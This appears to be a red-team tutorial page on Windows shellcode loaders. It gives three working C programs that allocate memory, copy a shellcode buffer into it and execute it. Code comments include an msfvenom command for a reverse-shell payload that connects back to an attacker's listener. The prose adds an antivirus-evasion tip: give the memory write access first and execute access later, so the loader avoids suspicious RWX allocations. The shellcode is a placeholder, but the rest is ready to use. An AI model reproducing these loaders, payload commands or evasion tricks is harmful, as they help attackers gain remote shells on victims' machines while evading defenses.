# Basics - Get detected!

## PE Format

We are most interested in **.text**, **.data**, and **.rsrc** sections since that is where the payloads will be stored.

![](https://3740919960-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Am0a4hPyOcUCfhPUAm9%2Fuploads%2FqVD5QzHlg1N5Pyhft35g%2Fimage.png?alt=media\&token=91252346-12ab-4f4c-a8ff-1ec7cfe667ac)

## Storing payload in .data

Global variables are stored in the .data.

```
#include<stdio.h>
#include<windows.h>

//msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -f c
// Declaring payload as a global variable

unsigned char buf[] = "Enter the shellcode generated by msfvenom here";

int main(){

        // VirtualAlloc returns an address and we store the address in a pointer
	// *exec points to memory space with size of buffer
	// Pointer to an allocated buffer address is the contents of it.
	void *exec = VirtualAlloc(
				0,	//System selects address
				sizeof buf, // Allocates buf size
				MEM_COMMIT, // Allocate commited memory
				PAGE_EXECUTE_READWRITE // Protection =R,W,X
				);
				
	//Copies contents of code into allocated memory "exec"
	memcpy(exec, buf, sizeof buf);
	
	//Calling void fuction pointer to payload buffer to execute it
	((void(*)())exec)();
	
	return 0;
}
```

If we turn off protection in windows :stuck\_out\_tongue: and execute, we get a reverse shell on our listener.

![](https://3740919960-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Am0a4hPyOcUCfhPUAm9%2Fuploads%2FXpqzZoyyqnZCwv0uanlB%2Fimage.png?alt=media\&token=4a9e3b73-82e9-489c-bef0-7b8c3e85738b)

**((void(\*)())exec)()** What are we doing here?&#x20;

* "exec" contains the memory address of the payload.
* To execute the shellcode in memory at address "exec", we need to trigger EIP to point to that address.
* Here, "void(\*)()" is a **pointer to a function** returning void and taking no arguments.&#x20;
  * Type is void.&#x20;
  * The function is "(\*)".
* The shellcode was first of type "unsigned char". We typecast it to "void(\*)()".
* The right most () call this function such that the EIP points to the address (exec) that contains our shellcode and execute it.

## Storing payload in .text

Declaring local variables inside main() will be stored on the **stack**.

In the code below, instead of giving "Execute" access while allocating the buffer "VirtualAlloc()" for the payload, we will do it in two stages.&#x20;

First we allocate and give R/W access using VirtualAlloc() and then give R/W/Execute access to the buffer using VirtualProtect().&#x20;

This is done to be as sneaky as possible since AV's will find it suspicious to see "R/W/X" access in VirualAlloc(). &#x20;

Also, notice that payload runs as a new thread since we use the CreateThread().

```
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    
	void * exec_mem;
	BOOL rv;
	HANDLE th;
    	DWORD oldprotect = 0;

	// Declaring payload variable in main() gets stored in Stack.
	unsigned char payload[] = "insert_Shellcode_here";

	unsigned int payload_len = sizeof payload;
	
	// Allocate a memory buffer for payload
	exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	// Copy payload to new buffer 
	RtlMoveMemory(exec_mem, payload, payload_len);	// Wrapper around memcpy
	
	// Change the exec_mem protection to Execute
	rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
	// If all good, run the payload
	if ( rv != 0 ){
		th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
		WaitForSingleObject(th, -1);
	}

	return 0;
}
```

We can achieve the same by using ((void(\*)())exec)().&#x20;

```
#include<stdio.h>
#include<windows.h>
#include <stdlib.h>
#include <string.h>

int main(){

	//msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -f c
	
	unsigned char payload[] = "insert_shellcode_here";
	void *exec;
	BOOL rv;
	DWORD oldprotect = 0;
	
	// VirtualAlloc returns an address and we store the address in a pointer
	// *exec points to memory space with size of buffer
	// Pointer to an allocated buffer address is the contents of it.
	exec = VirtualAlloc(0, sizeof payload, MEM_COMMIT, PAGE_READWRITE);
	
	// Copies contents of payload into allocated memory "exec"
	// RtlMoveMemory is same as memcpy and is a wrapper around it.
	RtlMoveMemory(exec,	// Destination
		     payload,	// Source
		     sizeof payload);
	
	// Change the memory protection from R/W to Execute R/W.	
	rv = VirtualProtect(exec, sizeof payload, PAGE_EXECUTE_READ, &oldprotect);
	
	// Calling void fuction pointer to opcode buffer to execute it
	((void(*)())exec)();
	return 0;
}
```